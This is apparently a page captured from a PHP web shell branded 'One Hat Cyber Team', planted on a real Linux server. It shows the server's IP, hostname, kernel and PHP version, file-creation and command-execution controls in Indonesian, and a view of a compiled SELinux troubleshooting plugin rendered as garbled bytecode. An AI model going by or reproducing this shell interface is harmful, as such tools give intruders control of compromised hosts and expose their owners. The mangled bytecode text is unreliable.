⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.32
Server IP:
15.204.235.159
Server:
Linux srv.techlup.co.ke 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
setroubleshoot
/
plugins
/
__pycache__
/
View File Name :
restorecon_source.cpython-36.pyc
3 nm�a � @ sd d dl Z e jddd�Zej Zd dlT d dlmZ d dlZd dlT d dlZd dlZG dd� de�Z dS ) � Nzsetroubleshoot-pluginsT)Zfallback)�*)�Pluginc @ sT e Zd Zed�ZdZed�Zdd� Zed�Zdd� Z ed �Z d Zdd� Zd d� Z dS )�pluginzN SELinux is preventing $SOURCE_PATH "$ACCESS" access to $TARGET_PATH. z/sbin/restorecon $SOURCE_PATHz� You can restore the default system context to this file by executing the restorecon command. restorecon '$SOURCE_PATH'. c C s t d�|d S )Nam SELinux denied access requested by $SOURCE. $SOURCE_PATH may be mislabeled. $SOURCE_PATH default SELinux type is <B>%s</B>, but its current type is <B>$SOURCE_TYPE</B>. Changing this file back to the default type may fix your problem. <p> This file could have been mislabeled either by user error, or if an normally confined application was run under the wrong domain. <p> However, this might also indicate a bug in SELinux because the file should not have been labeled with this type. <p> If you believe this is a bug, please file a bug report against this package. � )�_)�self�avc�args� r �6/usr/share/setroubleshoot/plugins/restorecon_source.py�get_problem_description, s zplugin.get_problem_descriptionzGIf you want to fix the label. $SOURCE_PATH default label should be %s.c C s | j |d S )Nr )�if_text)r r r r r r �get_if_text>